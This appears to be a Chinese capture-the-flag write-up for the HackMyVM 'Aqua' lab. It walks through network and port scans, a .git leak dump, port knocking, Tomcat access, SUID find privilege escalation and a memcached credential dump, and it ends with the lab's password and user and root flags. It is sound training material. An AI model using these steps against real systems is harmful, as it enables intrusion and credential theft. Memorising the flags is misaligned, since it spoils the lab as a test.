hackmyvm Aqua靶机复盘
难度-Medium
hackmyvm Aqua靶机复盘
网段扫描
1
2
3
4
5
6
7
8
9
10
11
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:df:e2:a7, IPv4: 192.168.56.110
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:15 (Unknown: locally administered)
192.168.56.100 08:00:27:76:81:d6 (Unknown)
192.168.56.101 08:00:27:ca:ae:52 (Unknown)
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.862 seconds (137.49 hosts/sec). 3 responded
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
└─# nmap -p- -sC -sV 192.168.56.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 22:55 EST
Nmap scan report for 192.168.56.101
Host is up (0.0094s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 00:11:32:04:42:e0:7f:98:29:7c:1c:2a:b8:a7:b0:4a (RSA)
| 256 9c:92:93:eb:1c:8f:84:c8:73:af:ed:3b:65:09:e4:89 (ECDSA)
|_ 256 a8:5b:df:d0:7e:31:18:6e:57:e7:dd:6b:d5:89:44:98 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Todo sobre el Agua
|_http-server-header: Apache/2.4.29 (Ubuntu)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5
MAC Address: 08:00:27:CA:AE:52 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.57 seconds
获取webshell
所获信息看出21端口是关闭的,我们可能需要knock开门,看一下web
找到登录路口,可以尝试一下
无果,感觉不一定是爆破,先扫一下80目录
这里有出现密码的zip,但是还是需要去整理一下
豁还有一个登录地方
无sql注入
看看图片隐写
换个工具获得新东西,.git泄露
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
└─# python3 GitHack.py http://192.168.56.101/SuperCMS/.git/
[+] Download and parse index file ...
[+] README.md
[+] css/main.css
[+] img/img.jpg
[+] index.html
[+] js/login.js
[+] login.html
[OK] index.html
[OK] js/login.js
[OK] css/main.css
[OK] README.md
[OK] login.html
[OK] img/img.jpg
┌──(root㉿LingMj)-[/home/lingmj/xxoo1/GitHack-master]
└─# ls -al
total 32
drwxr-xr-x 4 root root 4096 Jan 24 23:53 .
drwxr-xr-x 11 root root 4096 Jan 24 23:52 ..
drwxr-xr-x 5 root root 4096 Jan 24 23:53 192.168.56.101
-rw-r--r-- 1 root root 4789 May 9 2022 GitHack.py
-rw-r--r-- 1 root root 1172 May 9 2022 README.md
-rw-r--r-- 1 root root 620 Jan 24 23:53 index
drwxr-xr-x 3 root root 4096 Jan 24 23:52 lib
┌──(root㉿LingMj)-[/home/lingmj/xxoo1/GitHack-master]
└─# mv 1mv 192.168.56.101 /home/lingmj/xxoo
上面那个版本的git不行换一个
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
└─# python2 GitHack.py http://192.168.56.101/SuperCMS/.git
____ _ _ _ _ _
/ ___(_) |_| | | | __ _ ___| | __
| | _| | __| |_| |/ _` |/ __| |/ /
| |_| | | |_| _ | (_| | (__| <
\____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}
A '.git' folder disclosure exploit.
[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://192.168.56.101/SuperCMS/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
Cloning into '/home/lingmj/xxoo/GitHack-master/dist/192.168.56.101'...
fatal: repository 'http://192.168.56.101/SuperCMS/.git/' not found
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://192.168.56.101/SuperCMS/.git/ is support Directory Listing
[*] Initialize Git
[!] Initialize Git Error: hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all
hint: of your new repositories, which will suppress this warning, call:
hint:
hint: git config --global init.defaultBranch <name>
hint:
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
hint: 'development'. The just-created branch can be renamed via this command:
hint:
hint: git branch -m <name>
[*] ?C=N;O=D
[*] ?C=M;O=A
[*] ?C=S;O=A
[*] ?C=D;O=A
[*] Try to clone with Cache
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] ORIG_HEAD
[*] FETCH_HEAD
[*] refs/heads/master
[*] refs/remote/master
[*] index
[*] logs/HEAD
[*] refs/heads/main
[*] logs/refs/heads/main
[*] Fetch Commit Objects
[*] objects/2e/6cd2656d4e343dbcbc0e59297b9b217656c3a4
[*] objects/85/8e9f9a555b69355c6653fdbaf8313f5544b87b
[*] objects/c3/e76fb1f1bd32996e2549c699b0a4fa528e9a0d
[*] objects/3c/8d5a0eaa9166c7a39c4258f4e978c87ef7b59a
[*] objects/ef/130734c271906490f05c27856388adda62d193
[*] objects/65/e1413b82d1d648982030df2f0a074ab0b2fb0f
[*] objects/f2/ddc62d2c28669444fe6a75aae0f8a1e8a394e3
[*] objects/b3/bf4c0c41c0143d95f04daf4175eb5d72bd571f
[*] objects/86/c7d4bceaf2426b8455112a1fb74096efcc492d
[*] objects/29/631d6592a6d1ff54af273019fdc44798ae610f
[*] objects/ac/5bbd68afc5dc0d528f8e72daf14ab547c4b55a
[*] objects/0a/7f7bae77fbceffca773318badf380fde0b7e41
[*] objects/e7/2325e80888de98eab14cda8fb9d1dc3ffd0b2d
[*] objects/54/e7fc341e5aa8ecea353afa46de20d43ac7f2cd
[*] objects/7c/c5ddf306d952dad4291e6c63cc8452cae63235
[*] objects/f1/59677b7a6fb9090d9f8ba957e7e8a46f5b6df3
[*] objects/71/fcf328b4e83b72fee21decc2f370cef8646a0f
[*] objects/05/8c2c1ec60f3215de4cd2d0158d4c6a22682928
[*] objects/8c/b735a8c51987448f9386406933d0a147a1cb3f
[*] objects/62/096efb6acc0e9c2d64b01d6bdc963f2081912d
[*] objects/de/4b7e451460cae16556cc786fe812155a992087
[*] objects/3b/7e4b8bb0eeb8557fc3ab0b9e7acec16431150a
[*] objects/bd/5a878c5ffeb9125035ed7633d564b9a26e877c
[*] objects/9e/9757718772d622ed20b58f5445cb11d6015f79
[*] objects/58/afe63a1cd28fa167b95bcff50d2f6f011337c1
[*] objects/48/831280c8857ae4f644321279d4a6dc6aec79af
[*] objects/7b/1614729157e934673b9b90ac71a2007cbf2190
[*] objects/84/cdd811cbe5c10d9306017ef009a22833c02069
[*] Fetch Commit Objects End
[*] logs/refs/remote/master
[*] logs/refs/stash
[*] refs/stash
[*] Valid Repository
[+] Valid Repository Success
[+] Clone Success. Dist File : /home/lingmj/xxoo/GitHack-master/dist/192.168.56.101
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
└─# cat HEAD
ref: refs/heads/main
┌──(root㉿LingMj)-[/home/…/GitHack-master/dist/192.168.56.101/.git]
└─# cd refs/heads
┌──(root㉿LingMj)-[/home/…/192.168.56.101/.git/refs/heads]
└─# ls -al
total 12
drwxr-xr-x 2 root root 4096 Jan 25 00:06 .
drwxr-xr-x 5 root root 4096 Jan 25 00:06 ..
-rw-r--r-- 1 root root 41 Jan 25 00:06 main
┌──(root㉿LingMj)-[/home/…/192.168.56.101/.git/refs/heads]
└─# cat cat main
2e6cd2656d4e343dbcbc0e59297b9b217656c3a4
┌──(root㉿LingMj)-[/home/…/192.168.56.101/.git/refs/heads]
└─# cd ..
┌──(root㉿LingMj)-[/home/…/dist/192.168.56.101/.git/refs]
└─# cd ..
┌──(root㉿LingMj)-[/home/…/GitHack-master/dist/192.168.56.101/.git]
└─# cd ..
┌──(root㉿LingMj)-[/home/…/xxoo/GitHack-master/dist/192.168.56.101]
└─# git git checkout 2e6cd2656d4e343dbcbc0e59297b9b217656c3a4
Note: switching to '2e6cd2656d4e343dbcbc0e59297b9b217656c3a4'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at 2e6cd26 Add files via upload
┌──(roo
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
└─# git log --oneline
2e6cd26 (HEAD, origin/main, main) Add files via upload
c3e76fb Delete login.html
ac5bbd6 Update index.html
f159677 Update README.md
8cb735a Add files via upload
3b7e4b8 Delete knocking_on_Atlantis_door.txt
58afe63 Create knocking_on_Atlantis_door.txt
7b16147 Initial commit
┌──(root㉿LingMj)-[/home/…/xxoo/GitHack-master/dist/192.168.56.101]
└─# git checkout 58afe63 -- knocking_on_Atlantis_door.txt
┌──(root㉿LingMj)-[/home/…/xxoo/GitHack-master/dist/192.168.56.101]
└─# ls -al
total 40
drwxr-xr-x 6 root root 4096 Jan 25 00:12 .
drwxr-xr-x 3 root root 4096 Jan 25 00:06 ..
drwxr-xr-x 9 root root 4096 Jan 25 00:12 .git
-rw-r--r-- 1 root root 37 Jan 25 00:06 README.md
drwxr-xr-x 2 root root 4096 Jan 25 00:06 css
drwxr-xr-x 2 root root 4096 Jan 25 00:06 img
-rw-r--r-- 1 root root 799 Jan 25 00:06 index.html
drwxr-xr-x 2 root root 4096 Jan 25 00:06 js
-rw-r--r-- 1 root root 94 Jan 25 00:12 knocking_on_Atlantis_door.txt
-rw-r--r-- 1 root root 1878 Jan 25 00:06 login.html
┌──(root㉿LingMj)-[/home/…/xxoo/GitHack-master/dist/192.168.56.101]
└─# cat knocking_on_Atlantis_door.txt
Para abrir las puertas esta es la secuencia
(☞゚ヮ゚)☞ 1100,800,666 ☜(゚ヮ゚☜)
┌──(root㉿LingMj)-[/home/…/xxoo/GitHack-master/dist/192.168.56.101]
└─#
我对git不是很了解,所以利用一下gtp进行操作一下,知道了knock需要进行的端口
这里我没安装需要先安装一下
利用zip提示我们需要密码,可以考虑一下之前的提示 1=2 = passwd_zip
所以密码应该为agua=H2O
解压成功
存在tomcat用户密码
需要war的文件,发现reverse存在编写
提权
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
cat .bash_history
sudo -l
ps aux
nc 127.0.0.1 11211
su tridente
cd
ll
ls -la
cd conf
ls
cat tomcat-users.xml
exit
reset
export TERM=xterm
export SHELL=bash
stty rows 51 columns 238
nano
id
ls -la
cd home
ls .lka
ls .la
ls -la
cd tridente
ls -al
cat user.txt
.find
./find
./find . -exec /bin/bash \; -quit
ls
exit
reset
export TERM=xterm
export SHELL=bash
stty rows 37 columns 165
ls -la
cd home
ls
cd tridente/
ls -la
./find
./find . -exec /bin/sh \; -quit
sudo -l
ls
cat user.txt
cat .bash_history
ps aux
nc 127.0.0.1 11211
su tridente
su tridente
exit
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 57 columns 212
nano
stty rows 42 columns 159
nano
ls -la
cd home
ls -la
sudo -l
cd tridente
ls -la
find . -exec /bin/sh \; -quit
ls -la
cd /
find / -perm -4000 2>/dev/null
COMMAND=whoami
echo "$COMMAND" | at now
sh
ls -al
ls
ps aux
nc localhost 11211
这里已经完成了大部分解,但是没有说明密码,我们需要去寻找一下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
stats cachedump
CLIENT_ERROR bad command line
stats items
STAT items:1:number 5
STAT items:1:number_hot 1
STAT items:1:number_warm 0
STAT items:1:number_cold 4
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 0
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 80
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 53758
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 0
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 0
STAT items:1:hits_to_temp 0
END
stats cachedump 1 0
ITEM id [4 b; 0 s]
ITEM email [17 b; 0 s]
ITEM Name [14 b; 0 s]
ITEM password [18 b; 0 s]
ITEM username [8 b; 0 s]
END
1
2
3
4
5
6
7
8
get username
VALUE username 0 8
tridente
END
get password
VALUE password 0 18
N3ptun0D10sd3lM4r$
END
还整个gpg无语
好了靶场结束
userflag:f506a6ee37275430ac07caa95914aeba
rootflag:e16957fbc9202932b1dc7fe3e10a197e
This post is licensed under CC BY 4.0 by the author.